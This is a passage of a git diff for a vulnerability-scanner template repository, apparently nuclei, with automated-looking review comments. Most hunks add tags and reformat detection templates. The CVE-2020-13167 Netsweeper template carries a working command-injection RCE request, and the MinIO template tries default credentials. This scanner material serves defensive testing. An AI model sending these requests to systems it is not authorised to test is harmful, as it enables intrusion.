diff --git a/cves/2020/CVE-2020-12800.yaml b/cves/2020/CVE-2020-12800.yaml
index 4a4a96bb69..8216d0e966 100644
--- a/cves/2020/CVE-2020-12800.yaml
+++ b/cves/2020/CVE-2020-12800.yaml
@@ -6,6 +6,7 @@ info:
severity: critical
description: The drag-and-drop-multiple-file-upload-contact-form-7 plugin before 1.3.3.3 for WordPress allows Unrestricted File Upload and remote code execution by setting supported_type to php% and uploading a .php% file.
reference: https://github.com/amartinsec/CVE-2020-12800
+ tags: cve,cve2020,wordpress,wp-plugin
requests:
- raw:
diff --git a/cves/2020/CVE-2020-13167.yaml b/cves/2020/CVE-2020-13167.yaml
index ffe6eb67a4..961d153f44 100644
--- a/cves/2020/CVE-2020-13167.yaml
+++ b/cves/2020/CVE-2020-13167.yaml
@@ -9,13 +9,15 @@ info:
reference:
- https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/
- https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says
+ additional-fields:
+ hex-payload: 'echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out'
requests:
- method: GET
path:
- # Hex payload: echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out
- "{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5"
- "{{BaseURL}}/webadmin/out"
+
headers:
Referer: "{{BaseURL}}/webadmin/admin/service_manager_data.php"
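Review bot: Moving the decoded command into `additional-fields.hex-payload` keeps it visible, but nothing in `info` warns that this is not a passive check: the first request at line 26 executes the command on the target and writes a file (`out`, containing the string `nonexistent` from the base64) into `/usr/local/netsweeper/webadmin/`, and the template never removes it. A template with a persistent filesystem side effect should say so where operators read it, e.g. a `description:` sentence such as `Executes a command on the target and leaves /webadmin/out behind; remove it after testing.` The second request at line 27 fetches that same path, so the matchers (outside this hunk) presumably depend on the written file, which is worth stating as well.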
diff --git a/cves/2021/CVE-2021-3377.yaml b/cves/2021/CVE-2021-3377.yaml
index 77ded129f4..1b44686e3e 100644
--- a/cves/2021/CVE-2021-3377.yaml
+++ b/cves/2021/CVE-2021-3377.yaml
@@ -8,6 +8,7 @@ info:
- https://github.com/drudru/ansi_up/commit/c8c726ed1db979bae4f257b7fa41775155ba2e27
author: geeknik
severity: medium
+ tags: cve,cve2021,xss,npm
requests:
- raw:
diff --git a/default-logins/minio/minio-default-password.yaml b/default-logins/minio/minio-default-password.yaml
index 7d2b90fde6..12c46a6efe 100644
--- a/default-logins/minio/minio-default-password.yaml
+++ b/default-logins/minio/minio-default-password.yaml
@@ -4,23 +4,27 @@ info:
name: Minio Default Password
author: pikpikcu
severity: medium
+ tags: default-login,minio
requests:
- method: POST
path:
- "{{BaseURL}}/minio/webrpc"
+
headers:
Content-Type: application/json
- body: |
- {"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"Web.Login"}
+
+ body: '{"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"Web.Login"}'
- method: POST
path:
- "{{BaseURL}}/minio/webrpc"
+
headers:
Content-Type: application/json
- body: |
- {"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"web.Login"}
+
+ body: '{"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"web.Login"}'
+
matchers-condition: and
matchers:
diff --git a/technologies/prometheus-exposed-panel.yaml b/exposed-panels/prometheus-exposed-panel.yaml
similarity index 65%
rename from technologies/prometheus-exposed-panel.yaml
rename to exposed-panels/prometheus-exposed-panel.yaml
index b107509968..2cda5cc379 100644
--- a/technologies/prometheus-exposed-panel.yaml
+++ b/exposed-panels/prometheus-exposed-panel.yaml
@@ -1,9 +1,11 @@
id: prometheus-exposed-panel
+
info:
name: Prometheus.io exposed panel
author: organiccrap
severity: low
- # usually runs on port http/9090
+ tags: panel,prometheus
+
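Review bot: The only operational hint in this template, `# usually runs on port http/9090`, is dropped at line 89 without being carried anywhere else, so a user of the renamed `exposed-panels` template no longer learns that the default `{{BaseURL}}` on 80/443 is unlikely to hit Prometheus. Keep that information in a structured field the engine surfaces, e.g. `description: Prometheus web UI exposed without authentication; the server usually listens on port 9090 over http.` The matcher hunk below still ends without a trailing newline, which the reformat did not fix.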
requests:
- method: GET
path:
@@ -12,4 +14,4 @@ requests:
matchers:
- type: word
words:
- -
Prometheus Time Series Collection and Processing Server
+ - 'Prometheus Time Series Collection and Processing Server'
\ No newline at end of file
diff --git a/exposures/configs/yii-debugger.yaml b/exposures/configs/yii-debugger.yaml
index 11232d47b1..e93bfbf58e 100644
--- a/exposures/configs/yii-debugger.yaml
+++ b/exposures/configs/yii-debugger.yaml
@@ -4,7 +4,8 @@ info:
name: View Yii Debugger Information
author: geeknik
reference: https://yii2-framework.readthedocs.io/en/stable/guide/tool-debugger/
- severity: info
+ severity: low
+ tags: yii,debug,exposure
requests:
- method: GET
@@ -16,11 +17,14 @@ requests:
- "{{BaseURL}}/sapi/debug/default/view"
redirects: true
+ max-redirects: 2
+ stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200
+
- type: word
words:
- "Yii Debugger"
diff --git a/exposures/tokens/generic/shoppable-token.yaml b/exposures/tokens/generic/shoppable-token.yaml
index 0f68803be2..0c3d4080a0 100644
--- a/exposures/tokens/generic/shoppable-token.yaml
+++ b/exposures/tokens/generic/shoppable-token.yaml
@@ -5,6 +5,7 @@ info:
author: philippedelteil
severity: info
reference: https://ask.shoppable.com/knowledge/quick-start-api-guide
+ tags: exposure,shoppable,token
requests:
- method: GET
diff --git a/misconfiguration/front-page-misconfig.yaml b/misconfiguration/front-page-misconfig.yaml
index 7e982772b0..8d49471b46 100644
--- a/misconfiguration/front-page-misconfig.yaml
+++ b/misconfiguration/front-page-misconfig.yaml
@@ -5,6 +5,7 @@ info:
author: JTeles,pikpikcu
severity: info
reference: https://docs.microsoft.com/en-us/archive/blogs/fabdulwahab/security-protecting-sharepoint-server-applications
+ tags: misconfig,exposure,frontpage
requests:
- method: GET
diff --git a/technologies/artica-web-proxy-detect.yaml b/technologies/artica-web-proxy-detect.yaml
index 82b19cfb2d..8fd487f5ee 100644
--- a/technologies/artica-web-proxy-detect.yaml
+++ b/technologies/artica-web-proxy-detect.yaml
@@ -1,18 +1,22 @@
id: artica-web-proxy-detect
+
info:
name: Artica Web Proxy Detect
author: dwisiswant0
severity: info
+ tags: tech,artica,proxy
requests:
- method: GET
path:
- "{{BaseURL}}/fw.login.php"
+
matchers-condition: and
matchers:
- type: word
words:
- "Welcome to the Artica Web Administration Interface"
+
- type: status
status:
- 200
\ No newline at end of file
diff --git a/technologies/basic-auth-detection.yaml b/technologies/basic-auth-detection.yaml
index 66132d212e..894c3892d0 100644
--- a/technologies/basic-auth-detection.yaml
+++ b/technologies/basic-auth-detection.yaml
@@ -4,6 +4,7 @@ info:
name: Basic auth detection
author: w4cky_
severity: info
+ tags: tech,basic-auth
requests:
- method: GET
diff --git a/technologies/bigip-config-utility-detect.yaml b/technologies/bigip-config-utility-detect.yaml
index 4d3c250775..78b2741369 100644
--- a/technologies/bigip-config-utility-detect.yaml
+++ b/technologies/bigip-config-utility-detect.yaml
@@ -4,6 +4,7 @@ info:
name: BIG-IP Configuration Utility detected
author: dwisiswant0
severity: info
+ tags: tech,bigip
requests:
- method: GET
diff --git a/technologies/burp-api-detect.yaml b/technologies/burp-api-detect.yaml
index 68a7000ee7..10cc8bcac8 100644
--- a/technologies/burp-api-detect.yaml
+++ b/technologies/burp-api-detect.yaml
@@ -5,6 +5,7 @@ info:
author: joanbono
severity: info
reference: https://portswigger.net/burp/documentation/enterprise/api-reference
+ tags: burp,tech
requests:
- method: GET
diff --git a/technologies/cacti-detect.yaml b/technologies/cacti-detect.yaml
index 0a2a721928..9d1d018f12 100644
--- a/technologies/cacti-detect.yaml
+++ b/technologies/cacti-detect.yaml
@@ -4,6 +4,7 @@ info:
author: geeknik
description: Cacti is a complete network graphing solution -- https://www.cacti.net/
severity: info
+ tags: tech,cacti
requests:
- method: GET
diff --git a/technologies/clockwork-php-page.yaml b/technologies/clockwork-php-page.yaml
index 89ef10ba1b..a8537a2f36 100644
--- a/technologies/clockwork-php-page.yaml
+++ b/technologies/clockwork-php-page.yaml
@@ -1,9 +1,11 @@
id: clockwork-php-page
+
info:
name: Clockwork PHP page exposure
author: organiccrap
severity: high
reference: https://twitter.com/damian_89_/status/1250721398747791360
+ tags: tech,clockwork
requests:
- method: GET
diff --git a/technologies/cockpit-detect.yaml b/technologies/cockpit-detect.yaml
index 30bf745acc..81dd323dc8 100644
--- a/technologies/cockpit-detect.yaml
+++ b/technologies/cockpit-detect.yaml
@@ -4,6 +4,7 @@ info:
name: Detect Agentejo Cockpit
author: dwisiswant0
severity: info
+ tags: tech,cockpit
requests:
- method: GET
diff --git a/technologies/dell/dell-idrac6-detect.yaml b/technologies/dell/dell-idrac6-detect.yaml
index 9d8bb598ff..6f3c118b88 100644
--- a/technologies/dell/dell-idrac6-detect.yaml
+++ b/technologies/dell/dell-idrac6-detect.yaml
@@ -1,9 +1,11 @@
id: dell-idrac6-detect
+
info:
name: Detect Dell iDRAC6
author: kophjager007
description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers.
severity: info
+ tags: tech,dell
requests:
- method: GET
diff --git a/technologies/dell/dell-idrac7-detect.yaml b/technologies/dell/dell-idrac7-detect.yaml
index bddc00552b..220cfc4503 100644
--- a/technologies/dell/dell-idrac7-detect.yaml
+++ b/technologies/dell/dell-idrac7-detect.yaml
@@ -1,9 +1,11 @@
id: dell-idrac7-detect
+
info:
name: Detect Dell iDRAC7
author: kophjager007
description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers.
severity: info
+ tags: tech,dell
requests:
- method: GET
diff --git a/technologies/dell/dell-idrac8-detect.yaml b/technologies/dell/dell-idrac8-detect.yaml
index e25dc371e6..2fd72b97aa 100644
--- a/technologies/dell/dell-idrac8-detect.yaml
+++ b/technologies/dell/dell-idrac8-detect.yaml
@@ -1,9 +1,11 @@
id: dell-idrac8-detect
+
info:
name: Detect Dell iDRAC8
author: kophjager007
description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers.
severity: info
+ tags: tech,dell
requests:
- method: GET
diff --git a/technologies/dell/dell-idrac9-detect.yaml b/technologies/dell/dell-idrac9-detect.yaml
index 7677292de5..f339b04905 100644
--- a/technologies/dell/dell-idrac9-detect.yaml
+++ b/technologies/dell/dell-idrac9-detect.yaml
@@ -1,9 +1,11 @@
id: dell-idrac9-detect
+
info:
name: Detect Dell iDRAC9
author: kophjager007
description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers.
severity: info
+ tags: tech,dell
requests:
- method: GET
diff --git a/technologies/favicon-detection.yaml b/technologies/favicon-detection.yaml
index 7394c9fff3..3cf1e620d8 100644
--- a/technologies/favicon-detection.yaml
+++ b/technologies/favicon-detection.yaml
@@ -10,6 +10,7 @@ info:
- https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139
- https://github.com/devanshbatham/FavFreak
- https://github.com/sansatart/scrapts/blob/master/shodan-favicon-hashes.csv
+ tags: tech,favicon
requests:
- method: GET
diff --git a/technologies/firebase-detect.yaml b/technologies/firebase-detect.yaml
index fe3ff98b30..5c22ef8819 100644
--- a/technologies/firebase-detect.yaml
+++ b/technologies/firebase-detect.yaml
@@ -5,11 +5,13 @@ info:
author: organiccrap
severity: low
reference: http://ghostlulz.com/google-exposed-firebase-database/
+ tags: tech,firebase
requests:
- method: GET
path:
- "{{BaseURL}}/.settings/rules.json?auth=FIREBASE_SECRET"
+
matchers:
- type: word
words:
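Review bot: The path at line 332 sends the literal `auth=FIREBASE_SECRET`, which reads like a placeholder for a variable but is not one nuclei substitutes, so the request is effectively an unauthenticated read of `.settings/rules.json` with a bogus token. If that is intentional (detect the database regardless of the token), a comment above the path should say so, e.g. `# auth value is a dummy; only the presence/shape of the rules endpoint is checked`; otherwise the parameter should be removed or made a real variable. The matchers that decide what response counts as a hit lie outside this hunk.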
diff --git a/technologies/google-storage.yaml b/technologies/google-storage.yaml
index 27f4814a5b..95963c6a8c 100644
--- a/technologies/google-storage.yaml
+++ b/technologies/google-storage.yaml
@@ -4,6 +4,7 @@ info:
name: Google Bucket detection
author: 0xTeles
severity: info
+ tags: tech,gstorage,google,bucket
requests:
- method: GET
diff --git a/technologies/graphql-detect.yaml b/technologies/graphql-detect.yaml
index ef649b7d06..53d67b1326 100644
--- a/technologies/graphql-detect.yaml
+++ b/technologies/graphql-detect.yaml
@@ -4,6 +4,7 @@ info:
name: GraphQL API Detection
author: NkxxkN,ELSFA7110
severity: info
+ tags: tech,graphql
requests:
- method: POST
diff --git a/technologies/graylog-api-browser.yaml b/technologies/graylog-api-browser.yaml
index 6c93a114fa..98799a87c0 100644
--- a/technologies/graylog-api-browser.yaml
+++ b/technologies/graylog-api-browser.yaml
@@ -4,6 +4,7 @@ info:
name: Detect Graylog REST API
author: PR3R00T
severity: info
+ tags: tech,graylog
requests:
- method: GET
diff --git a/technologies/gunicorn-detect.yaml b/technologies/gunicorn-detect.yaml
index 69f286e77b..56f5080384 100644
--- a/technologies/gunicorn-detect.yaml
+++ b/technologies/gunicorn-detect.yaml
@@ -1,9 +1,11 @@
id: gunicorn-detect
+
info:
name: Detect Gunicorn Server
author: joanbono
description: Gunicorn Python WSGI HTTP Server for UNIX - https://github.com/benoitc/gunicorn
severity: info
+ tags: tech,gunicorn
requests:
- method: GET
@@ -22,4 +24,4 @@ requests:
- type: kval
part: header
kval:
- - Server
+ - Server
\ No newline at end of file
diff --git a/technologies/harbor-detect.yaml b/technologies/harbor-detect.yaml
index e082b48acf..1ede65a8df 100644
--- a/technologies/harbor-detect.yaml
+++ b/technologies/harbor-detect.yaml
@@ -1,8 +1,10 @@
id: harbor-detect
+
info:
name: Harbor Detect
author: pikpikcu
severity: info
+ tags: tech,harbor
requests:
- method: GET
diff --git a/technologies/home-assistant.yaml b/technologies/home-assistant.yaml
index 0522fc067b..dfb82e44b7 100644
--- a/technologies/home-assistant.yaml
+++ b/technologies/home-assistant.yaml
@@ -4,6 +4,7 @@ info:
name: Detect Home Assistant
author: fabaff
severity: info
+ tags: tech,iot
requests:
- method: GET
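Review bot: The new `tags: tech,iot` at line 414 is the only tag line in this commit that omits the product name, so `-tags` filtering by product (as every sibling template in the diff allows, e.g. `tech,kibana`, `tech,pihole`) will not find this template. Suggest `tags: tech,iot,homeassistant` for consistency with the rest of the set.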
diff --git a/technologies/ilo-detect.yaml b/technologies/ilo-detect.yaml
index 70f0fc1e8d..6eeff924eb 100644
--- a/technologies/ilo-detect.yaml
+++ b/technologies/ilo-detect.yaml
@@ -5,6 +5,7 @@ info:
author: milo2012
severity: info
description: Version of HP iLO
+ tags: tech,ilo
requests:
- method: GET
diff --git a/technologies/jaspersoft-detect.yaml b/technologies/jaspersoft-detect.yaml
index 7cafc9a84d..e26ad12b3f 100644
--- a/technologies/jaspersoft-detect.yaml
+++ b/technologies/jaspersoft-detect.yaml
@@ -4,6 +4,7 @@ info:
name: Jaspersoft detected
author: koti2
severity: info
+ tags: tech,jaspersoft
requests:
- method: GET
diff --git a/technologies/jellyfin-detect.yaml b/technologies/jellyfin-detect.yaml
index ae031c20ca..9b31eaed43 100644
--- a/technologies/jellyfin-detect.yaml
+++ b/technologies/jellyfin-detect.yaml
@@ -4,6 +4,7 @@ info:
name: Jellyfin detected
author: dwisiswant0
severity: info
+ tags: tech,jellyfin
requests:
- method: GET
@@ -13,6 +14,8 @@ requests:
- "{{BaseURL}}/index.html"
- "{{BaseURL}}/web/index.html"
- "{{BaseURL}}/web/manifest.json"
+
+ stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
@@ -22,6 +25,7 @@ requests:
- "The Free Software Media System"
condition: or
part: body
+
- type: status
status:
- 200
diff --git a/technologies/jolokia.yaml b/technologies/jolokia.yaml
index f6b28ff6ad..957b898273 100644
--- a/technologies/jolokia.yaml
+++ b/technologies/jolokia.yaml
@@ -4,11 +4,13 @@ info:
name: Jolokia Version Disclosure
author: mavericknerd,dwisiswant0
severity: info
+ tags: tech,jolokia
requests:
- method: GET
path:
- '{{BaseURL}}/jolokia/version'
+
matchers-condition: and
matchers:
- type: word
@@ -17,6 +19,7 @@ requests:
- '"protocol":'
- '"agent":'
condition: and
+
- type: status
status:
- 200
diff --git a/technologies/kibana-detect.yaml b/technologies/kibana-detect.yaml
index c35b4dd301..c64939b6df 100644
--- a/technologies/kibana-detect.yaml
+++ b/technologies/kibana-detect.yaml
@@ -4,6 +4,7 @@ info:
name: Kibana Service Detection
author: petruknisme
severity: info
+ tags: tech,kibana
requests:
- method: GET
diff --git a/technologies/kong-detect.yaml b/technologies/kong-detect.yaml
index 6164d7c1cd..39e4d58bb7 100644
--- a/technologies/kong-detect.yaml
+++ b/technologies/kong-detect.yaml
@@ -4,6 +4,7 @@ info:
author: geeknik
description: The Cloud-Native API Gateway - https://github.com/Kong/kong
severity: info
+ tags: tech,kong
requests:
- method: GET
diff --git a/technologies/liferay-portal-detect.yaml b/technologies/liferay-portal-detect.yaml
index ebf42ab88b..2a8de63c94 100644
--- a/technologies/liferay-portal-detect.yaml
+++ b/technologies/liferay-portal-detect.yaml
@@ -1,9 +1,11 @@
id: liferay-portal-detect
+
info:
name: Liferay Portal Detection
author: organiccrap,dwisiswant0
severity: info
reference: https://github.com/mzer0one/CVE-2020-7961-POC # CVE-2020-7961: Liferay Portal Unauthenticated RCE
+ tags: tech,liferay
requests:
- method: GET
diff --git a/technologies/linkerd-badrule-detect.yaml b/technologies/linkerd-badrule-detect.yaml
index 5e445af239..0e1ef8ff57 100644
--- a/technologies/linkerd-badrule-detect.yaml
+++ b/technologies/linkerd-badrule-detect.yaml
@@ -1,15 +1,11 @@
id: linkerd-badrule-detect
-# Detect the Linkerd service by overriding the delegation table with an invalid
-# rule, the presence of the service is indicated by either:
-# - a "Via: .. linkerd .."
-# - a "l5d-err" and/or a "l5d-success" header
-# - a literal error in the body
-
info:
name: Linkerd detection via bad rule
author: dudez
severity: info
+ tags: tech,linkerd
+ reference: https://linkerd.io
requests:
- method: GET
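Review bot: Deleting the comment block at lines 535-539 removes the only explanation of what the probe does and which signals (a `Via` header mentioning linkerd, an `l5d-err`/`l5d-success` header, or a literal error body) indicate a hit, and the substitute `reference: https://linkerd.io` is the product homepage rather than anything about the delegation table or `l5d-*` headers. That rationale belongs in a field the engine shows, e.g. `description: Detects Linkerd by overriding the delegation table with an invalid rule; presence is indicated by a Via header containing linkerd, an l5d-err/l5d-success header, or a literal error in the body.` The request and matchers it describes continue outside this hunk.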
diff --git a/technologies/lotus-domino-version.yaml b/technologies/lotus-domino-version.yaml
index 3af4529ee9..897d6fad2e 100644
--- a/technologies/lotus-domino-version.yaml
+++ b/technologies/lotus-domino-version.yaml
@@ -1,8 +1,10 @@
id: lotus-domino-version
+
info:
name: Lotus Domino Version Extractor
author: CasperGN
severity: info
+ tags: tech,lotus
requests:
- method: GET
path:
diff --git a/technologies/metabase-detect.yaml b/technologies/metabase-detect.yaml
index 2b8c4cec7d..3a865ab0e7 100644
--- a/technologies/metabase-detect.yaml
+++ b/technologies/metabase-detect.yaml
@@ -1,13 +1,17 @@
id: metabase-version-detect
+
info:
name: Detect Metabase Version
author: revblock
description: If a Metabase instance is deployed on the target URL it will return a login page with the version number in the page source
severity: info
+ tags: tech,metabase
+
requests:
- method: GET
path:
- "{{BaseURL}}/auth/login"
+
matchers-condition: and
matchers:
diff --git a/technologies/mrtg-detect.yaml b/technologies/mrtg-detect.yaml
index 19a062f6fa..96f95f15d6 100644
--- a/technologies/mrtg-detect.yaml
+++ b/technologies/mrtg-detect.yaml
@@ -1,9 +1,11 @@
id: mrtg-detect
+
info:
name: Detect MRTG
author: geeknik
description: The Multi Router Traffic Grapher -- https://oss.oetiker.ch/mrtg/
severity: info
+ tags: tech,mrtg
requests:
- method: GET
diff --git a/technologies/netsweeper-webadmin-detect.yaml b/technologies/netsweeper-webadmin-detect.yaml
index cc107c6ddc..04b545b315 100644
--- a/technologies/netsweeper-webadmin-detect.yaml
+++ b/technologies/netsweeper-webadmin-detect.yaml
@@ -4,6 +4,7 @@ info:
name: Netsweeper WebAdmin detected
author: dwisiswant0
severity: info
+ tags: tech,netsweeper
requests:
- method: GET
diff --git a/technologies/nginx-version.yaml b/technologies/nginx-version.yaml
index 9674f616ed..302d5d3d19 100644
--- a/technologies/nginx-version.yaml
+++ b/technologies/nginx-version.yaml
@@ -1,9 +1,12 @@
id: nginx-version
+
info:
name: nginx version detect
author: philippedelteil
description: Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.
severity: info
+ tags: tech,nginx
+
requests:
- method: GET
path:
diff --git a/technologies/nifi-detech.yaml b/technologies/nifi-detech.yaml
index 8e593cc440..837e4c43fd 100644
--- a/technologies/nifi-detech.yaml
+++ b/technologies/nifi-detech.yaml
@@ -4,6 +4,7 @@ info:
name: Apache NiFi detect
author: dwisiswant0
severity: info
+ tags: tech,apache,nifi
requests:
- method: GET
@@ -15,6 +16,7 @@ requests:
- "{{BaseURL}}/flow/registries"
- "{{BaseURL}}/system-diagnostics"
- "{{BaseURL}}/nifi-api/access/config"
+
matchers-condition: and
matchers:
- type: regex
@@ -22,6 +24,7 @@ requests:
- "supportsLogin"
- "disconnectedNodeAcknowledged"
- "(aggregate|node)Snapshots?"
+
- type: status
status:
- 200
diff --git a/technologies/oidc-detect.yaml b/technologies/oidc-detect.yaml
index d8f65083d7..f87bf320d2 100644
--- a/technologies/oidc-detect.yaml
+++ b/technologies/oidc-detect.yaml
@@ -1,9 +1,11 @@
id: oidc-detect
+
info:
name: Detect OpenID Connect provider
author: jarijaas
severity: info
description: Detects OpenID Connect providers. See https://en.wikipedia.org/wiki/OpenID_Connect
+ tags: tech,oidc
requests:
- method: GET
diff --git a/technologies/openam-detection.yaml b/technologies/openam-detection.yaml
index b3c603dde0..fd1653f20f 100644
--- a/technologies/openam-detection.yaml
+++ b/technologies/openam-detection.yaml
@@ -4,6 +4,7 @@ info:
name: Detect OpenAM and OpenSSO
author: philippedelteil
severity: info
+ tags: tech,openam
requests:
- method: GET
diff --git a/technologies/pi-hole-detect.yaml b/technologies/pi-hole-detect.yaml
index 0f5cbcb052..22d1a56dca 100644
--- a/technologies/pi-hole-detect.yaml
+++ b/technologies/pi-hole-detect.yaml
@@ -1,8 +1,10 @@
id: pi-hole-detect
+
info:
name: pi-hole detector
author: geeknik
severity: info
+ tags: tech,pihole
requests:
- method: GET
@@ -14,6 +16,7 @@ requests:
- type: status
status:
- 200
+
- type: word
words:
- "Pi-hole"
diff --git a/technologies/prtg-detect.yaml b/technologies/prtg-detect.yaml
index c57d90484d..c630eff289 100644
--- a/technologies/prtg-detect.yaml
+++ b/technologies/prtg-detect.yaml
@@ -1,9 +1,11 @@
id: prtg-detect
+
info:
name: Detect PRTG
author: geeknik
description: Monitor all the systems, devices, traffic, and applications in your IT infrastructure -- https://www.paessler.com/prtg
severity: info
+ tags: tech,prtg
requests:
- method: GET
diff --git a/technologies/redmine-cli-detect.yaml b/technologies/redmine-cli-detect.yaml
index 24a02349aa..8cb08b7888 100644
--- a/technologies/redmine-cli-detect.yaml
+++ b/technologies/redmine-cli-detect.yaml
@@ -4,6 +4,7 @@ info:
author: geeknik
description: A small command-line utility to interact with Redmine - https://pypi.org/project/Redmine-CLI/
severity: info
+ tags: tech,redmine
requests:
- method: GET
diff --git a/technologies/s3-detect.yaml b/technologies/s3-detect.yaml
index fe617373af..3ed37bb68e 100644
--- a/technologies/s3-detect.yaml
+++ b/technologies/s3-detect.yaml
@@ -4,6 +4,7 @@ info:
name: Detect Amazon-S3 Bucket
author: melbadry9
severity: info
+ tags: aws,s3,bucket,tech
requests:
- method: GET
diff --git a/technologies/shiro-detect.yaml b/technologies/shiro-detect.yaml
index 321f556a03..8353c48494 100644
--- a/technologies/shiro-detect.yaml
+++ b/technologies/shiro-detect.yaml
@@ -1,16 +1,20 @@
id: shiro-detect
+
info:
name: Detect Shiro Framework
author: AresX
severity: info
+ tags: tech,shiro
+
requests:
- method: GET
path:
- '{{BaseURL}}'
headers:
Cookie: rememberMe=123;
+
matchers:
- type: word
words:
- - rememberMe=deleteMe
+ - 'rememberMe=deleteMe'
part: header
\ No newline at end of file
diff --git a/technologies/springboot-actuator.yaml b/technologies/springboot-actuator.yaml
index 6bc4c9e7a1..ebc7edbe1e 100644
--- a/technologies/springboot-actuator.yaml
+++ b/technologies/springboot-actuator.yaml
@@ -4,13 +4,17 @@ info:
name: Detect Springboot Actuators
author: that_juan_,dwisiswant0,wdahlenb
severity: info
+ tags: tech,springboot,actuator
requests:
- method: GET
path:
+ - "{{BaseURL}}"
- "{{BaseURL}}/actuator"
- "{{BaseURL}}/favicon.ico"
+ - "{{BaseURL}}/actuator/favicon.ico"
+ stop-at-first-match: true
matchers-condition: or
matchers:
- type: word
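Review bot: Adding a bare `{{BaseURL}}` request at line 779 to a template whose matchers are combined with `matchers-condition: or` means any word matcher that happens to appear on the site's landing page now produces an "actuator detected" result, and `stop-at-first-match: true` at line 783 will then suppress the more specific `/actuator` probe. Whether that is a false-positive risk depends on the matchers, which lie outside this hunk; if they are as loose as a `Content-Type` or a single word, consider scoping the root request to its own specific matcher or dropping it. A comment such as `# root request: only useful if the matcher below is specific to actuator output` would at least record the intent.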
diff --git a/technologies/sql-server-reporting.yaml b/technologies/sql-server-reporting.yaml
index 5b08ec1032..4b64c61e6f 100644
--- a/technologies/sql-server-reporting.yaml
+++ b/technologies/sql-server-reporting.yaml
@@ -4,6 +4,7 @@ info:
name: Detect Microsoft SQL Server Reporting
author: puzzlepeaches
severity: info
+ tags: tech,micrsoft
requests:
- method: GET
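Review bot: The new tag at line 795 is misspelled (`micrsoft`), so `-tags microsoft` will never select this template and it will silently fall out of any Microsoft-focused run. Change it to `tags: tech,microsoft` (optionally adding `ssrs` or `reporting` for product-level filtering).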
diff --git a/technologies/telerik-fileupload-detect.yaml b/technologies/telerik-fileupload-detect.yaml
index 810cef7a8b..8f150d8b40 100644
--- a/technologies/telerik-fileupload-detect.yaml
+++ b/technologies/telerik-fileupload-detect.yaml
@@ -4,11 +4,13 @@ info:
name: Detect Telerik Web UI fileupload handler
author: organiccrap
severity: info
+ tags: tech,telerik
requests:
- method: GET
path:
- "{{BaseURL}}/Telerik.Web.UI.WebResource.axd?type=rau"
+
matchers:
- type: word
words:
diff --git a/technologies/terraform-detect.yaml b/technologies/terraform-detect.yaml
index 8c4d3307df..4a458c77e2 100644
--- a/technologies/terraform-detect.yaml
+++ b/technologies/terraform-detect.yaml
@@ -1,9 +1,11 @@
id: terraform-detect
+
info:
name: Detect Terraform Provider
author: geeknik
description: Write Infrastructure as Code - https://www.terraform.io/
severity: info
+ tags: tech,terraform
requests:
- method: GET
diff --git a/technologies/tomcat-detect.yaml b/technologies/tomcat-detect.yaml
index d5a164932d..5561dba63d 100644
--- a/technologies/tomcat-detect.yaml
+++ b/technologies/tomcat-detect.yaml
@@ -1,10 +1,12 @@
-id: tomcat-version-detect
+id: tomcat-version
+
info:
name: Detect Tomcat Version
author: philippedelteil
- description: If an Tomcat instance is deployed on the target URL, when we send a request for
- a non existent resource we receive a Tomcat error page with version.
+ description: If an Tomcat instance is deployed on the target URL, when we send a request for a non existent resource we receive a Tomcat error page with version.
severity: info
+ tags: tech,tomcat,apache
+
requests:
- method: GET
path:
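Review bot: Renaming the template id from `tomcat-version-detect` to `tomcat-version` at line 836 is a user-visible breaking change: anyone selecting or excluding this check by id will lose it, and the new id now diverges from both the filename `tomcat-detect.yaml` and the `*-detect` naming used by the other technology templates in this commit. If the rename is deliberate, note it in the commit message and consider renaming the file to match; otherwise keep the old id. The folded description at line 843 still reads `If an Tomcat instance`, which should be `If a Tomcat instance`.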
diff --git a/technologies/tor-socks-proxy.yaml b/technologies/tor-socks-proxy.yaml
index ddbe880309..4957f092b8 100644
--- a/technologies/tor-socks-proxy.yaml
+++ b/technologies/tor-socks-proxy.yaml
@@ -1,8 +1,10 @@
id: tor-socks-proxy
+
info:
name: Detect tor SOCKS proxy
author: geeknik
severity: info
+ tags: tech,tor,proxy
requests:
- method: GET
diff --git a/technologies/weblogic-detect.yaml b/technologies/weblogic-detect.yaml
index 6d290ac6f8..4effb62c55 100644
--- a/technologies/weblogic-detect.yaml
+++ b/technologies/weblogic-detect.yaml
@@ -4,6 +4,7 @@ info:
name: Detect Weblogic
author: bing0o
severity: info
+ tags: tech,weblogic
requests:
- method: GET
diff --git a/technologies/werkzeug-debugger-detect.yaml b/technologies/werkzeug-debugger-detect.yaml
index f11eac5435..aa90f4c1a3 100644
--- a/technologies/werkzeug-debugger-detect.yaml
+++ b/technologies/werkzeug-debugger-detect.yaml
@@ -4,6 +4,7 @@ info:
name: Werkzeug debugger console
author: pdteam
severity: info
+ tags: tech,werkzeug
requests:
- method: GET
diff --git a/vulnerabilities/lsoft/listserv_maestro_rce.yaml b/vulnerabilities/lsoft/listserv_maestro_rce.yaml
